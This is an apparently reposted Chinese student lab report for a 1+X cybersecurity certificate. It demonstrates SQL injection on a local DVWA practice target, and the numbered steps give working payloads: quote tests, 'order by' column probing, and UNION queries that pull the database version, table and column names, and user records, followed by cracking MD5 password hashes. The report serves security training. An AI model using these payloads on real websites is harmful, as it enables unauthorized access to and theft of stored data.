1+X 网络安全运营平台与管理 sql注入实验报告

这篇具有很好参考价值的文章主要介绍了1+X 网络安全运营平台与管理 sql注入实验报告。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

项目化考核 1+X 证书(网络安全运营平台管理)

实验目的:

实验设备 (环境) 

实验要求:

实验原理:

实验步骤:

实验总结:

 加油各位( •̀ ω •́ )y 期待与君再相逢


项目化考核 1+X 证书(网络安全运营平台管理)

实验目的:

掌握SQLmap 的使用 SQL注入漏洞利用

1、了解数据库的查询规则

2、熟悉SQL查询语句

3、了解SQL注入的危害性

实验设备 (环境) 

          环境:phpstudy软件  dvwa靶场  Windows 10 x64

实验要求:

        1.判断是否存在注入,注入是字符型还是数字型;

        2.猜解当前数据库名;

        3.猜解数据库中的表名;

        4.猜解表中的字段名;

        5.猜解数据

实验原理:

       1、数据库基础

       2、SQL注入漏洞利用

       3、报错注入

       4、盲注

       5、HTTP文件头注入

       6、SQLmap 的使用

实验步骤:

1.访问靶场地址http://127.0.0.1/DVWA-master/security.php,

在dvwa security选项中,可以调整dvwa的难易程度 

将安全等级改为low网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

2.选择SQL Injection,在输入框随意输入数字查看回显

3.判断是否存在SQL注入网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

  • 输入1提交网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全
  • 输入1'提交

网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

  • 输入1 and 1=1 提交

网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

  •  输入1 and 1=2 提交网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

 由上可以看出是存在注入点的,并且是以单引号闭合的,

所以我们猜测sql查询语句是这样的:

Select  First name的列名and Surname的列名 from 表名 where id的列名='id'

4.判断列数

  • 输入1' order by 2# 提交网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全
  •  输入1' order by 3# 提交

网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

 网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

 由此,我们判断列数为2列

5.UNION注入

1' union select 1,2#网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

 从上图可以看出有2个回显

6.查询当前的数据库及版本

输入 1' union select version(),database()#

网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

 7.获取数据库中的表

1' union select 1, group_concat(table_name) from information_schema.tables where table_schema=database()#或者

1' union select 1,group_concat(table_name) from information_schema.tables where table_schema='dvwa'#网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

 8.获取表中的字段名

1' union select 1, group_concat(column_name) from information_schema.columns where table_name='users'#网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

 9.获取字段中的数据

网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

 10.这里密码使用了MD5加密,可在https://www.cmd5.com/进行解密网络安全服务1+x实训报告,数据库,sql,服务器,web安全,安全

 得到密码

实验总结:

本次实验过程中,了解了其原理并掌握了其注入的方法及流程。在寻找可进行注入的URL过程中,尝试着对多个URL进行SQL注入,使用“and 1=1”及“and 1=2”确认网站是否有SQL注入漏洞,确认注入是字符型还是数字型;判断列,然后就行UNION注入进而猜解当前数据库名表名;字段名;从而获得数据文章来源地址https://www.toymoban.com/news/detail-516841.html

 加油各位( •̀ ω •́ )y 期待与君再相逢

到了这里,关于1+X 网络安全运营平台与管理 sql注入实验报告的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全---SQL注入攻击

            SQL 注入是一种代码注入技术,可利用 Web 应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在 Web 应用程序中正确检查时,该漏洞就存在。         许多 Web 应用程序从用户处获取输入,然后使用这些输入构建 SQL 查询

    2024年04月12日
    浏览(47)
  • 网络安全必学SQL注入

    SQL注入漏洞可以说是在企业运营中会遇到的最具破坏性的漏洞之一,它也是目前被利用得最多的漏洞。要学会如何防御SQL注入,首先我们要学习它的原理。 针对SQL注入的攻击行为可描述为通过在用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻

    2024年02月03日
    浏览(61)
  • 【网络安全】初探SQL注入漏洞

    要想玩SQL注入,一个简单的数据交互页面是需要的,故我们用PHP做一个简易网页,有登录、注册和首页三块内容。 登录需要输入账号密码,等待提交后进入系统; 注册需要输入名字,密码,手机号,照片,等待提交后进入系统; 首页需要利用PHP和数据库联动后的查询语句,

    2024年02月16日
    浏览(40)
  • 网络安全-初学SQL注入&基本概念

    SQL语句:解释SQL(Structured Query Language)是一种用于与关系型数据库进行交互的语言。SQL语句用于执行各种数据库操作,例如插入、更新、删除和查询数据。 用户输入与SQL查询的拼接:说明应用程序通常会接受用户的输入,并将其用作构建SQL查询语句的一部分。这种拼接用户

    2024年02月13日
    浏览(39)
  • 「网络安全」SQL注入攻击的真相

    点击此处即可获得282G网络安全学习资料 我们生活在数据的黄金时代。有些公司将其分析为更好的自己,有些公司为了获利而进行交易,没有一家公司因其价值而自由放弃 - 对于他们的业务和犯罪分子。 SQL(结构化查询语言)是一种非常流行的与数据库通信的方式。虽然许多

    2024年02月07日
    浏览(47)
  • 网络安全之SQL注入及防御(下篇)

    目录 什么是SQL注入? 一,SQL注入会导致什么呢? 二,SQL注入思想与步骤 三,SQL注入的绕过 四,sqlmap工具的使用  五,sql注入的防御方法 总结 什么是SQL注入? SQL注入(SQL Injection)是一种常见的网络攻击手段,是因为应用程序对用户输入的数据验证不到位造成的。攻击者在

    2024年04月28日
    浏览(39)
  • 【网络安全】SQL注入漏洞的修复建议

    SQL注入是Web应用程序常见的安全漏洞之一,攻击者通过恶意构造的SQL查询语句,成功在应用程序的数据库中执行任意操作,导致数据泄露、篡改或其他安全问题。 本篇技术博客将详细介绍SQL注入漏洞的修复建议,包括过滤危险字符和使用预编译语句,通过具体的代码案例帮助

    2024年02月06日
    浏览(50)
  • 网络安全B模块(笔记详解)- SQL注入

    1.使用渗透机场景kali中工具扫描服务器场景,将apache的端口号和版本号作为Flag提交(格式:端口号_版本号)  Flag:8081_7.5 2.使用渗透机场景windows7访问服务器场景SQL网站,并将网站中概述页面中的Flag提交; Flag:sql_is_good 3.使用渗透机场景windows7访问服务器中的SQL网站中的数

    2024年01月20日
    浏览(47)
  • 网络安全进阶学习第九课——SQL注入介绍

    将 不受信任 的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入、NoSQL注入、OS 注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在 没有适当授权 的情况下执行非预期命令或访问数据。 注入能导致 数据丢失、破坏 或 泄露给无授权方 ,缺乏可审

    2024年02月14日
    浏览(42)
  • SQL注入 ❤ ~~~ 网络空间安全及计算机领域常见英语单词及短语——网络安全(二)

    就比如登录页面,输入用户名admin和密码123456,网页告诉服务器我的用户名和密码,服务器就会去问数据库,有没有这个用户名admin并且密码为123456的用户,服务器收到数据库的回答就回去告诉网页,有这个用户就登录成功,没有就登录失败。SQL注入就是在网页告诉服务器我的

    2024年02月13日
    浏览(42)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包